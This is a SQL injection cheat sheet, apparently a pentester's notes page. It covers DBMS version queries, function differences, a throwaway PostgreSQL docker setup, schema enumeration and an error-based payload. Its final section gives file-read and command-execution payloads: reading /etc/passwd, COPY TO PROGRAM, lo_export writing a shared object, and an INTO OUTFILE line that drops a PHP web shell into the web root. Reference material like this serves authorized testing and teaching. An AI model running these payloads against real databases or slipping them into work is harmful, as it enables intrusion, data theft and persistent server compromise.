Title here
Summary here
SQL Injection
Definition
SQL injection allows attackers to execute malicious SQL queries through user input areas, potentially accessing, modifying, or deleting data.
DMBS Identification
Version
| DBMS | Query | Output (example) |
|---|---|---|
| SQLite | SELECT sqlite_version() | 3.42.0 |
| MySQL | SELECT VERSION() | 5.7.38 |
| PostgreSQL | SELECT version() | PostgreSQL 14.8 … |
SQL Functions
| PostgreSQL | SQLite | MySQL |
|---|---|---|
'a'||'b' | 'a'||'b' | 'a' 'b' |
POW(3,2) | POW(3,2) | POW(3,2) |
CHR(65) | CHAR(65) | CHAR(65) |
ASCII('A') | UNICODE('A') | ASCII('A') |
SUBSTR('abc',2,1) | SUBSTR('abc',2,1) | SUBSTR('abc',2,1) |
PG_SLEEP(4) | Unknown | SLEEP(4) |
SIMILAR TO, ~ | REGEXP, GLOB | REGEXP |
Testing & Documentation
- PostgreSQL - Online - Docs
- MySQL - Online - Docs
- MariaDB - Online
- Microsoft SQL Server - Online
- Oracle - Online
- SQLite3: run the command
sqlite3- Docs
$ sudo docker run -d --rm --name test-postgres -e POSTGRES_PASSWORD=s3cr3t -e PGDATA=/var/lib/postgresql/data/pgdata postgres:16.3-bookworm
$ sudo docker exec -it test-postgres bash
root@1d5aa23dac7c:/# psql -U postgres
psql (16.3 (Debian 16.3-1.pgdg120+1))
Type "help" for help.
postgres=#Database enumeration
MySQL
SELECT GROUP_CONCAT(schema_name,',') FROM information_schema.schemata;
SELECT GROUP_CONCAT(table_name,',') FROM information_schema.tables;
SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE table_name = 'users';PostgreSQL
SELECT datname FROM pg_database;
SELECT string_agg(table_name,',') FROM information_schema.tables;
SELECT string_agg(column_name,',') FROM information_schema.columns WHERE table_name = 'users';SQLite
SELECT GROUP_CONCAT(tbl_name,',') FROM sqlite_master WHERE type='table' AND tbl_name NOT like 'sqlite_%';
SELECT sql FROM sqlite_master WHERE tbl_name='users';
SELECT GROUP_CONCAT(name,',') FROM PRAGMA_TABLE_INFO('users');Error based
PostgreSQL
' AND 1=CAST((SELECT username FROM users) AS int)--File read/write & RCE
PostgreSQL
SELECT pg_ls_dir('.');
SELECT pg_read_file('/etc/passwd');
COPY (SELECT '') TO PROGRAM 'sleep 5';
SELECT lo_import('/etc/passwd', 31337);
SELECT lo_get(31337);
SELECT lo_from_bytea(131337, decode('SGVsbG8gV29ybGQh', 'base64'));
SELECT lo_export(131337, '/tmp/exploit.so');MySQL
SELECT LOAD_FILE('/etc/passwd');
SELECT '<?php system($_REQUEST[c]); ?>' INTO OUTFILE '/var/www/html/shell.php';